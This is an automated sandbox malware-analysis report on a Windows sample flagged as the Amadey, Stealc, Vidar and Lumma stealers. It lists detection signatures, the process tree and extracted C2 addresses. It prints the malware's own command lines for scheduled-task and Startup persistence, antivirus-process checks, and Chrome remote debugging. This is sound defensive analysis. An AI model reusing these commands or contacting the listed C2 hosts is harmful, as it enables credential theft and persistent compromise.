Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1546540
MD5:08fa512abc42a3d5f8ba6ad72f5c550e
SHA1:6b38e59bc4dfdebe5396700e918b96fc22a07611
SHA256:d573c7e78c05a4d3a653269e00635a56516fefa23a8485a29fdecf75ef5b5e18
Tags:exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Yara detected Amadeys stealer DLL
Yara detected Cryptbot
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to start a terminal service
Creates multiple autostart registry keys
Drops PE files with a suspicious file extension
Drops large PE files
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • SgrmBroker.exe (PID: 6680 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • sppsvc.exe (PID: 4504 cmdline: C:\Windows\system32\sppsvc.exe MD5: 320823F03672CEB82CC3A169989ABD12)
  • svchost.exe (PID: 4040 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6420 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5060 cmdline: C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6968 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 7192 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • file.exe (PID: 5740 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 08FA512ABC42A3D5F8BA6AD72F5C550E)
    • axplong.exe (PID: 7468 cmdline: "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: 08FA512ABC42A3D5F8BA6AD72F5C550E)
  • svchost.exe (PID: 7376 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • axplong.exe (PID: 7616 cmdline: C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 08FA512ABC42A3D5F8BA6AD72F5C550E)
  • svchost.exe (PID: 8012 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • axplong.exe (PID: 8068 cmdline: C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 08FA512ABC42A3D5F8BA6AD72F5C550E)
    • stealc_default2.exe (PID: 4092 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000066001\stealc_default2.exe" MD5: 68A99CF42959DC6406AF26E91D39F523)
    • Offnewhere.exe (PID: 7260 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000477001\Offnewhere.exe" MD5: 87E4E869971CEC9573811040F6140157)
      • chrome.exe (PID: 4196 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • splwow64.exe (PID: 7300 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000817001\splwow64.exe" MD5: 5D97C2475C8A4D52E140EF4650D1028B)
      • cmd.exe (PID: 1168 cmdline: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 2380 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 1888 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 3028 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 2992 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 7504 cmdline: cmd /c md 197036 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • findstr.exe (PID: 7520 cmdline: findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 7536 cmdline: cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Jurisdiction.pif (PID: 7552 cmdline: Jurisdiction.pif T MD5: 18CE19B57F43CE0A5AF149C96AECC685)
          • cmd.exe (PID: 7672 cmdline: cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • schtasks.exe (PID: 6244 cmdline: schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)
          • cmd.exe (PID: 5948 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & echo URL="C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • choice.exe (PID: 7568 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
    • new_v8.exe (PID: 2864 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000828001\new_v8.exe" MD5: 5009B1EF6619ECA039925510D4FD51A1)
    • f55899dae2.exe (PID: 2348 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000833001\f55899dae2.exe" MD5: 26D8D52BAC8F4615861F39E118EFA28D)
      • RegAsm.exe (PID: 6688 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 3364 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • 550b7cfe5f.exe (PID: 5732 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000857001\550b7cfe5f.exe" MD5: 6250E716BE9BB3618C85DA75BB8A8351)
    • GOLD1234.exe (PID: 5504 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000965001\GOLD1234.exe" MD5: BDF3C509A0751D1697BA1B1B294FD579)
      • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RDX123456.exe (PID: 5292 cmdline: "C:\Users\user~1\AppData\Local\Temp\1001096001\RDX123456.exe" MD5: FBA8F56206955304B2A6207D9F5E8032)
  • svchost.exe (PID: 7700 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 6844 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • EcoCraft.scr (PID: 7836 cmdline: "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • wscript.exe (PID: 2080 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • EcoCraft.scr (PID: 5380 cmdline: "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
CryptBotA typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default_valenciga"}
{"C2 url": ["computeryrati.site", "faulteyotk.site", "contemteny.site", "authorisev.site", "servicedny.site", "goalyfeastz.site", "opposezmny.site", "seallysl.site", "dilemmadu.site"], "Build id": "4SD0y4--RLREBORN"}
{"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default_valenciga"}
{"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
{"C2 list": ["sevjoi17sr.top", "home.sevjoi17sr.top", "0/80/home.sevjoi17sr.top"]}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeJoeSecurity_StealcYara detected StealcJoe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exeJoeSecurity_StealcYara detected StealcJoe Security
      SourceRuleDescriptionAuthorStrings
      00000016.00000003.2179626539.0000000000BD0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000002A.00000003.2809427690.0000000000F56000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000A.00000002.1425044391.0000000000C51000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            00000016.00000003.2257510373.0000000000BD3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000016.00000003.2256959453.0000000000BD2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 53 entries
                SourceRuleDescriptionAuthorStrings
                17.0.stealc_default2.exe.770000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  17.2.stealc_default2.exe.770000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    13.2.axplong.exe.c50000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      10.2.axplong.exe.c50000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        9.2.axplong.exe.c50000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                          Click to see the 1 entries

                          System Summary

                          barindex
                          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user~1\AppData\Local\Temp\1001471001\c8908bf20d.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ProcessId: 8068, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c8908bf20d.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7672, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F, ProcessId: 6244, ProcessName: schtasks.exe
                          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js", ProcessId: 6844, ProcessName: wscript.exe
                          Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\1000477001\Offnewhere.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe, ParentProcessId: 7260, ParentProcessName: Offnewhere.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", ProcessId: 4196, ProcessName: chrome.exe
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user~1\AppData\Local\Temp\1001471001\c8908bf20d.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ProcessId: 8068, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c8908bf20d.exe
                          Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Jurisdiction.pif T, CommandLine: Jurisdiction.pif T, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1168, ParentProcessName: cmd.exe, ProcessCommandLine: Jurisdiction.pif T, ProcessId: 7552, ProcessName: Jurisdiction.pif
                          Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif, ProcessId: 7552, TargetFilename: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\1000817001\splwow64.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe, ParentProcessId: 7300, ParentProcessName: splwow64.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat, ProcessId: 1168, ProcessName: cmd.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7672, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F, ProcessId: 6244, ProcessName: schtasks.exe
                          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif, ProcessId: 7552, TargetFilename: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr
                          Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 5740, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" , ProcessId: 7468, ProcessName: axplong.exe
                          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js", ProcessId: 6844, ProcessName: wscript.exe
                          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup, ProcessId: 4040, ProcessName: svchost.exe

                          Data Obfuscation

                          barindex
                          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe, ProcessId: 2348, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LgAmARwZ.url

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: Process startedAuthor: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1168, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 2992, ProcessName: findstr.exe
                          No Suricata rule has matched

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: file.exeAvira: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\new_v8[1].exeAvira: detection malicious, Label: HEUR/AGEN.1313486
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeAvira: detection malicious, Label: TR/AD.Stealc.cucnc
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exeAvira: detection malicious, Label: TR/AD.Stealc.cucnc
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: 0000000A.00000002.1425044391.0000000000C51000.00000040.00000001.01000000.00000007.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
                          Source: 17.2.stealc_default2.exe.770000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default_valenciga"}
                          Source: 17.2.stealc_default2.exe.770000.0.unpackMalware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default_valenciga"}
